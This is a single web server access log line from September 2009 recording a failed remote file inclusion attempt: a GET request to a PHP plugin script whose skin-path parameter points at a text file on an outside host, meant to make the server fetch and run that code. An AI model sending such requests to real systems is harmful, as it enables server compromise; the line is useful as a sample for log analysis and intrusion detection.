195.137.160.12 - - [08/Sep/2009:06:18:08 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
